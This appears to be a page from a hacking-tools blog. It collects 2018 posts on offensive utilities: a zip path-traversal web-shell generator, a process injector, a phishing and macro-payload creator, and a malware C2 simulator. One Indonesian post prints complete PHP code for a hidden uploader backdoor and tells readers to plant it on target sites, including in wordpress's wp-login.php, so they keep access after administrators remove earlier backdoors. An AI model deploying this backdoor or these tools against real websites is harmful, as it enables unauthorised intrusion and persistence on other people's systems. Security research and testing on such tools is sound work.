News Ticker

Latest Posts

ZIP Shotgun - Utility Script To Test Zip File Upload Functionality (And Possible Extraction Of Zip Files) For Vulnerabilities

- Sunday, December 16, 2018 No Comments

Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities. Idea for this script comes from this post on Silent Signal Techblog - Compressed File Upload And Command Execution and from OWASP - Test Upload of Malicious Files
This script will create archive which contains files with "../" in filename. When extracting this could cause files to be extracted to preceding directories. It can allow attacker to extract shells to directories which can be accessed from web browser.
Default webshell is wwwolf's PHP web shell and all the credit for it goes to WhiteWinterWolf. Source is available HERE

Installation
  1. Install using Python pip
    pip install zip-shotgun --upgrade
  2. Clone git repository and install
    git clone https://github.com/jpiechowka/zip-shotgun.git
    Execute from root directory of the cloned repository (where setup.py file is located)
    pip install . --upgrade

Usage and options
Usage: zip-shotgun [OPTIONS] OUTPUT_ZIP_FILE

Options:
  --version                       Show the version and exit.
  -c, --directories-count INTEGER
                                  Count of how many directories to go back
                                  inside the zip file (e.g 3 means that 3
                                  files will be added to the zip: shell.php,
                                  ../shell.php and ../../shell.php where
                                  shell.php is the name of the shell you
                                  provided or randomly generated value
                                  [default: 16]
  -n, --shell-name TEXT           Name of the shell inside the generated zip
                                  file (e.g shell). If not provided it will be
                                  randomly generated. Cannot have whitespaces
  -f, --shell-file-path PATH      A file that contains code for the shell. If
                                  this option is not provided wwwolf
                                  (https://github.com/WhiteWinterWolf/wwwolf-
                                  php-webshell) php shell will be added
                                  instead. If name is provided it will be
                                  added to the zip with the provided name or
                                  if not provided the name will be randomly
                                  generated.
  --compress                      Enable compression. If this flag is set
                                  archive will be compressed using DEFALTE
                                  algorithm with compression level of 9. By
                                  default there is no compression applied.
  -h, --help                      Show this message and exit.

Examples
  1. Using all default options
    zip-shotgun archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: BCsQOkiN23ur7OUj
    12/Dec/2018 Wed 23:13:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Writing file to the archive: ../../BCsQOkiN23ur7OUj.php
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../BCsQOkiN23ur7OUj.php
    ...
    12/Dec/2018 Wed 23:13:13 +0100 |     INFO | Finished. Try to access shell using BCsQOkiN23ur7OUj.php in the URL
  2. Using default options and enabling compression for archive file
    zip-shotgun --compress archive.zip
    Part of the script output
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 6B6NtnZXbXSubDCh
    12/Dec/2018 Wed 23:16:13 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    ...
    12/Dec/2018 Wed 23:16:13 +0100 |     INFO | Finished. Try to access shell using 6B6NtnZXbXSubDCh.php in the URL
  3. Using default options but changing the number of directories to go back in the archive to 3
    zip-shotgun --directories-count 3 archive.zip
    zip-shotgun -c 3 archive.zip
    The script will write 3 files in total to the archive
    Part of the script output
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell name was not provided. Generated random shell name: 34Bv9YoignMHgk2F
    12/Dec/2018 Wed 23:17:43 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: 34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Writing file to the archive: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../34Bv9YoignMHgk2F.php
    12/Dec/2018 Wed 23:17:43 +0100 |     INFO | Finished. Try to access shell using 34Bv9YoignMHgk2F.php in the URL
  4. Using default options but providing shell name inside archive and enabling compression
    Shell name cannot have whitespaces
    zip-shotgun --shell-name custom-name --compress archive.zip
    zip-shotgun -n custom-name --compress archive.zip
    Name for shell files inside the archive will be set to the one provided by the user.
    Part of the script output
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:19:12 +0100 |  WARNING | Shell file was not provided. Using default wwwolf's webshell code
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Using default file extension for wwwolf's webshell: php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Writing file to the archive: ../../../custom-name.php
    ...
    12/Dec/2018 Wed 23:19:12 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL
  5. Provide custom shell file but use random name inside archive. Set directories count to 3
    zip-shotgun --directories-count 3 --shell-file-path ./custom-shell.php archive.zip
    zip-shotgun -c 3 -f ./custom-shell.php archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be randomly generated.
    Part of the script output
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:21:37 +0100 |  WARNING | Shell name was not provided. Generated random shell name: gqXRAJu1LD8d8VKf
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | --compress flag was NOT set. Archive will be uncompressed. Files will be only stored.
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Writing file to the archive: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../gqXRAJu1LD8d8VKf.php
    12/Dec/2018 Wed 23:21:37 +0100 |     INFO | Finished. Try to access shell using gqXRAJu1LD8d8VKf.php in the URL
  6. Provide custom shell file and set shell name to save inside archive. Set directories count to 3 and use compression
    zip-shotgun --directories-count 3 --shell-name custom-name --shell-file-path ./custom-shell.php --compress archive.zip
    zip-shotgun -c 3 -n custom-name -f ./custom-shell.php --compress archive.zip
    Shell code will be extracted from user provided file. Names inside the archive will be set to user provided name.
    Part of the script output
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening output zip file: REDACTED\zip-shotgun\archive.zip
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | File containing shell code was provided: REDACTED\zip-shotgun\custom-shell.php. Content will be added to archive
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Getting file extension from provided shell file for reuse: php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Opening provided file with shell code: REDACTED\zip-shotgun\custom-shell.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | --compress flag was set. Archive will be compressed using DEFLATE algorithm with a level of 9
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Writing file to the archive: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Setting full read/write/execute permissions (chmod 777) for file: ../../custom-name.php
    12/Dec/2018 Wed 23:25:19 +0100 |     INFO | Finished. Try to access shell using custom-name.php in the URL


Faraday v3.4 - Collaborative Penetration Test and Vulnerability Management Platform

- No Comments

Here’s the main new features and improvements in Faraday v3.4:
Services can now be tagged. With this new feature, you can now easily identify important services, geolocate them and more.
New search operators OR/NOT
In a previous release we added the AND operator, now with 3.4 you can also use OR and NOT operators in the Status Report search box.
This will allow you to find vulnerabilities easily with filters like this one:
(severity:critical or severity:high) or name:”MS18-172”
Performance improvements for big workspaces
We have been working on optimization for our API Rest endpoints to support millions of vulnerabilities in each workspace.

Here is the full change log for version 3.4
  • In GTK, check active_workspace it's not null
  • Add fbruteforce services fplugin
  • Attachments can be added to a vulnerability through the API.
  • Catch gaierror error on lynis plugin
  • Add OR and NOT with parenthesis support on status report search
  • Info API now is public
  • Web UI now detects Appscan plugin
  • Improve performance on the workspace using custom query
  • Workspaces can be set as active/disable in the welcome page.
  • Change Nmap plugin, response field in VulnWeb now goes to Data field.
  • Update code to support latest SQLAlchemy version
  • Fix `create_vuln` fplugin bug that incorrectly reported duplicated vulns
  • The client can set a custom logo to Faraday
  • Centered checkboxes in user list page
  • Client or pentester can't activate/deactivate workspaces
  • In GTK, dialogs now check that user_info is not False
  • Add tags in Service object (Frontend and backend API)
  • Limit of users only takes the active ones
  • Improve error message when the license is not valid


imaginaryC2 - Tool Which Aims To Help In The Behavioral (Network) Analysis Of Malware

- No Comments

author: Felix Weyne (website) (Twitter)

Imaginary C2 is a python tool which aims to help in the behavioral (network) analysis of malware.
Imaginary C2 hosts a HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.

By using this tool, an analyst can feed the malware consistent network responses (e.g. C&C instructions for the malware to execute). Additionally, the analyst can capture and inspect HTTP requests towards a domain/IP which is off-line at the time of the analysis.

Replay packet captures
Imaginary C2 provides two scripts to convert packet captures (PCAPs) or Fiddler Session Archives into request definitions which can be parsed by imaginary C2. Via these scripts the user can extract HTTP request URLs and domains, as well as HTTP responses. This way, one can quickly replay HTTP responses for a given HTTP request.

Technical details
requirements: Imaginary C2 requires Python 2.7 and Windows.
modules: Currently, Imaginary C2 contains three modules and two configuration files:
Filename Function
1. imaginary_c2.py Hosts python's simple HTTP server. Main module.
2. redirect_to_imaginary_c2.py Alters Windows' host file and Windows' (IP) Routing Table.
3. unpack_fiddler_archive.py & unpack_pcap.py Extracts HTTP responses from packet captures. Adds corresponding HTTP request domains and URLs to the configuration files.
4. redirect_config.txt Contains domains and IPs which needs to be redirected to localhost (to the python HTTP server).
5. requests_config.txt Contains URL path definitions with the corresponding data sources.
request definitions: Each (HTTP) request defined in the request configuration consists of two parameters:
Parameter 1: HTTP request URL path (a.k.a. urlType)
Value Meaning
fixed Define the URL path as a literal string
regex Define a regex pattern to be matched on the URL path
Parameter 2: HTTP response source (a.k.a. sourceType)
Value Meaning
data Imaginary C2 will respond with the contents of a file on disk
python Imaginary C2 will run a python script. The output of the python script defines the HTTP response.

Demo use case: Simulating TrickBot servers
Imaginary C2 can be used to simulate the hosting of TrickBot components and configuration files. Additionally, it can also be used to simulate TrickBot's web injection servers.

How it works:
Upon execution, the TrickBot downloader connects to a set of hardcoded IPs to fetch a few configuration files. One of these configuration files contains the locations (IP addresses) of the TrickBot plugin servers. The Trickbot downloader downloads the plugins (modules) from these servers and decrypts them. The decrypted modules are then injected into a svchost.exe instance.


One of TrickBot's plugins is called injectdll, a plugin which is responsible for TrickBot's webinjects. The injectdll plugin regularly fetches an updated set of webinject configurations. For each targeted (banking) website in the configuration, the address of a webfake server is defined. When a victim browses to a (banking) website which is targeted by TrickBot, his browser secretly gets redirected to the webfake server. The webfake server hosts a replica of the targeted website. This replica website usually is used in a social-engineering attack to defraud the victim.

Imaginary C2 in action:
The below video shows the TrickBot downloader running inside svchost.exe and connecting to imaginary C2 to download two modules. Each downloaded module gets injected into a newly spawned svchost.exe instance. The webinject module tries to steal the browser's saved passwords and exfiltrates the stolen passwords to the TrickBot server. Upon visiting a targeted banking website, TrickBot redirects the browser to the webfake server. In the demo, the webfake server hosts the message: "Default imaginary C2 server response" (full video).



Cara Memasang Script Hidden Uploader di Website

- Thursday, November 22, 2018 No Comments
Cara Memasang Script Hidden Uploader di Website -  Kali ini kita akan bahas memasang Script Hidden Uploader pada website Target kita agar tidak kehilangan akses.

Cara Memasang Script Hidden Uploader di Website
Biasanya digunakan untuk menyembunyikan uploader kita jadi saya biasanya menamai file tersebut index.php. Langsung saja copy file berikut :
<?php
if(isset($_GET["uploader"]))
 {
  echo"<font color=#ffffff>".php_uname()."";
  print "\n";$disable_functions = @ini_get("disable_functions"); 
  echo "<br>DisablePHP=".$disable_functions; print "\n"; 
  echo"<br><form method=post enctype=multipart/form-data>"; 
  echo"<input type=file name=f><input name=k type=submit id=k value=upload><br>"; 
    if($_POST["k"]==upload)
{ if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>".$_FILES["f"]["name"];
}else{
echo"<b>Gagal upload sayang";
}
} 
}
Misal kita menemukan target yang index.php-nya kosong contoh seperti berikut : 
http://target.com/wp-content/uploads
Lalu kita Upload file hidden uploader tadi yang kita namai index.php pada dir tempat yg index.php- kosong. Lalu kita buka:
http://target.com/wp-content/uploads/index.php
Akan terlihat kosong blank, untuk memanggil uploadernya, masukan query pada url nya menjadi seperti berikut:
http://target.com/wp-content/uploads/index.php?uploader
Maka akan terlihat uploadernya.
script hidden uploader backdoor
Metode ini biasanya digunakan untuk cadangan backdoor, jika backdoor kita sudah dihapus oleh administratornya kita masih bisa upload backdoor baru.

Oiya script uploader ini kuga bisa di masukan pada script lainnya, Tempat favorit saya adalah di wp-login.php jika targetnya wordpress ya. Jika targetnya beda kalian masukan di bagian login admin saja.

Clrinject - Injects C# EXE Or DLL Assembly Into Every CLR Runtime And AppDomain Of Another Process

- Wednesday, October 10, 2018 No Comments

Injects C# EXE or DLL Assembly into any CLR runtime and AppDomain of another process. The injected assembly can then access static instances of the injectee process's classes and therefore affect it's internal state.

Usage
clrinject-cli.exe -p <processId/processName> -a <assemblyFile>
Opens process with id <processId> or name <processName>, inject <assemblyFile> EXE and execute Main method.

Additional options
  • -e Enumerates all loaded CLR Runtimes and created AppDomains.
  • -d <#> Inject only into <#>-th AppDomain. If no number or zero is specified, assembly is injected into every AppDomain.
  • -i <namespace>.<className>Create an instance of class <className> from namespace <namespace>.

Examples

Usage examples
  • clrinject-cli.exe -p victim.exe -e
    (Enumerate Runtimes and AppDomains from victim.exe)
  • clrinject-cli.exe -p 1234 -a "C:\Path\To\invader.exe" -d 2
    (Inject invader.exe into second AppDomain from process with id 1234)
  • clrinject-cli.exe -p victim.exe -a "C:\Path\To\invader.dll" -i "Invader.Invader"
    (Create instance of Invader inside every AppDomain in victim.exe)
  • clrinject-cli64.exe -p victim64.exe -a "C:\Path\To\invader64.exe"
    (Inject x64 assembly into x64 process)

Injectable assembly example
Following code can be compiled as C# executable and then injected into a PowerShell process. This code accessees static instances of internal PowerShell classes to change console text color to green.
using System;
using System.Reflection;

using Microsoft.PowerShell;
using System.Management.Automation.Host;

namespace Invader
{
    class Invader
    {
        static void Main(string[] args)
        {
            try
            {
                var powerShellAssembly = typeof(ConsoleShell).Assembly;
                var consoleHostType = powerShellAssembly.GetType("Microsoft.PowerShell.ConsoleHost");
                var consoleHost = consoleHostType.GetProperty("SingletonInstance", BindingFlags.Static | BindingFlags.NonPublic).GetValue(null);

                var ui = (PSHostUserInterface)consoleHostType.GetProperty("UI").GetValue(consoleHost);
                ui.RawUI.ForegroundColor = ConsoleColor.Green;
            }
            catch (Exception e)
            {
                Console.WriteLine(e.ToString());
            }
        }
    }
}
Injection command:
clrinject-cli64.exe -p powershell.exe -a "C:\Path\To\invader64.exe"

Result:


Note: Tools ini belum kami uji, jika ada pertanyaan silahkan kunjungi langsung link di bawah ini.

ANDRAX - The First And Unique Penetration Testing Platform For Android Smartphones

- Tuesday, October 9, 2018 No Comments

ANDRAX The first and unique Penetration Testing platform for Android smartphones
What is ANDRAX
ANDRAX is a penetration testing platform developed specifically for Android smartphones, ANDRAX has the ability to run natively on Android so it behaves like a common Linux distribution, But more powerful t

Docker TOR Hidden Service - Easily Setup A Hidden Service Inside The Tor Network

- No Comments
Easily run a hidden service inside the Tor network with this container
Generate the skeleton configuration for you hidden service, replace for your hidden service pattern name. Example, if you want to your hidden service contain the word 'boss', just use this word as argument. You can use regular expressions, like ^boss, will generate an address wich will start with 'boss'. Be aware that bigger the pattern, more time it will take to generate it.

docker run -it --rm -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx generate <pattern>
Create an container named 'hiddensite' to serve your generated hidden service
docker run -d --restart=always --name hiddensite -v $(pwd)/web:/web \
       strm/tor-hiddenservice-nginx 

Example
Let's create a hidden service with the name beginning with strm.

docker pull strm/tor-hiddenservice-nginx
Wait to the container image be downloaded. And them we can generate our site skeleton:
$docker run -it --rm -v $(pwd)/web:/web strm/tor-hiddenservice-nginx generate ^strm
[+] Generating the address with mask: ^strm
[+] Found matching domain after 137072 tries: strmfyygjp5st54g.onion
[+] Generating nginx configuration for site  strmfyygjp5st54g.onion
[+] Creating www folder
[+] Generating index.html template
Now we have our skeleton generated, we can run the container with:
docker run -d --restart=always --name hiddensite \
       -v $(pwd)/web:/web strm/tor-hiddenservice-nginx
And you have the service running ! :)
Troubleshoot
  • 403 error on nginx, check your directory permissions and folder permissions. Nginx run as "hidden" user, his UID is 666, just check if you give this user access to the /web/www folder (in the case the folder mapped to it).
  • Build
    docker build -t strm/tor-hiddenservice-nginx .

    Run
    docker run -d --restart=always --name hiddensite
    -v $(pwd)/web:/web strm/tor-hiddenservice-nginx

    Shell
    docker run -it --rm -v $(pwd)/web:/web
    --entrypoint /bin/bash strm/tor-hiddenservice-nginx


     

Camelishing Social Engineering Tool

- Sunday, October 7, 2018 No Comments
Camelishing Social Engineering Tool - Camelishing adalah tool untuk melakukan social engineering atau biasa di sebut soceng, jika kalian tidak tau apa itu soceng, soceng adalah trik untuk memanipulasi (menipu) seseorang untuk menjebak dan mendapatkan informasi dari korban.

Camelishing Social Engineering Tool Tool Camelishing ini berjalan pada windows dengan menginstall python3, sebelum kalian menginstal tool ini kalian menginstall Python3 terlebih dahulu disini, dan tentunya kalian sudah mengintall Microsoft Office juga.

Selengkapnya tentang Camelishing Social Engineering Tool

Contact

[!]CONTACT[!]
| Coded Abdulaziz ALTUNTA┼× |
| Email: a.azizaltuntas@gmail.com |
| Github: github/azizaltuntas     |
| Twitter: @esccopyright          |

Features

1-Bulk email sending
2-Basic Python Agent Creator
3-Office Excel Macro Creator
4-DDE Excel Creator(or Custom Payload)
5-Return ─░nformation
 *[Mail Open Track]
 *[Agent Open Track]

6-AutoSave
7-Statistics Report
8-User Control

Installation Modules

$ pip install -r requirements.txt
$ Install Microsoft Office

If Installation Failed please try to

Install Python 3.6 & Pip3 (Just install Python 3.6 Pip already comes with it!)
Use pip3 to install the requirments 
-------------------------
$ pip3 install -r requirments.txt 

If you get Error to create Macro

Please follow the steps below! 
N|Solid N|Solid N|Solid N|Solid N|Solid

Tested and Supported

[+]Windows 7
[+]Windows 10

+SCREENSHOT

Mail Sender

[+] Note :  Compress and send the exe file(rar,zip)

[+] Start Project : python start.py
N|Solid

Macro Creator

N|Solid

Agent Creator

N|Solid

Agent

N|Solid

DDE Creator

N|Solid

General Setting

N|Solid

Mail Send

N|Solid

Open Mail

N|Solid

Return Information

N|Solid

Statistic Report

N|Solid

    DarkSpiritz - A Penetration Testing Framework For UNIX Systems

    - Saturday, October 6, 2018 No Comments

    What is DarkSpiritz?

    Created by the SecTel Team it was a project of one of the owners to update and clean-up an older pentesting framework he had created to something updated and modern. DarkSpiritz is a re-vamp of the very popular framework known as "Roxysploit". You may be familiar with this framework and if you are then it will help you with DarkSpiritz. DarkSpiritz also works like another pentesting framework known as Metasploit. If you know how to use metasploit setting up and working with DarkSpiritz will be a breeze. Inside the program itself you will find a lot of help and documentation on plugins or you can head to our wiki here. If you need any help feel free to contact us at sectel.team@protonmail.com.
    Getting Started
    Clone the repository with git:
    git clone https://github.com/DarkSpiritz/DarkSpiritz.git
    DarkSpiritz wiki available here
    To install DarkSpiritz clone the github repo and run:
    sudo python installer.py
    This will download all necessary modules for DarkSpiritz. Once you run this you will be able to run:
    python main.py
    from within the same directory as DarkSpiritz.
    You will see a start-up screen. This screen will display things like commands and configuration settings. You can set configuration settings inside the config.xml file itself or through commands in the DarkSpiritz shell.

    Features:
    These are features that DarkSpiritz Team prides themself on based on this program:
    • Real Time Updating of Configuration
    • Never a need to restart the program even when adding plugins or editing them.
    • Easy to use UX
    • Multi-functionality

    Screenshots:




     

    Leaked? 2.0 - A Checking Tool For Hash Codes, Passwords And Emails Leaked

    - Monday, September 24, 2018 No Comments

    Leaked? is A Checking tool for Hash codes and Passwords and Emails leaked, uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken.
    Leaked? can work in any OS if they have support Python 3 and 2.

    What's new?
    • Check email leaked
    • Update
    • More friendly for users
    • Support Python 2 and 3

    Features
    • Check passwords leaked
    • Check hash code leaked
    • Check email leaked NEW!
    • Update NEW!
    • Exit
    • About Author

    Install and Run in Linux
    sudo apt update && apt install python3 python3-pip
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip3 install -r requirements.txt
    pip install -r requirements.txt
    python3 leaked.py
    or python leaked.py

    Install and Run in Windows
    Download and run Python 3 setup file from Python.org. In Install Python 3 , enable Add Python 3.7 to PATH and For all users
    Download and run Git setup file from Git-scm.com, choose Use Git from Windows Command Propmt.
    After that, Run Command Propmt or PowerShell and enter this commands:
    git clone https://github.com/GitHackTools/Leaked
    cd Leaked
    pip install -r requirements.txt
    python leaked.py

    Update Leaked?: git pull -f

    Notes
    Leaked? uses leakz module from Aidan Holland, and leakz module uses API from Aurelius Wendelken
    Let follow their Twitter account!

    Screenshots




    Contact to Author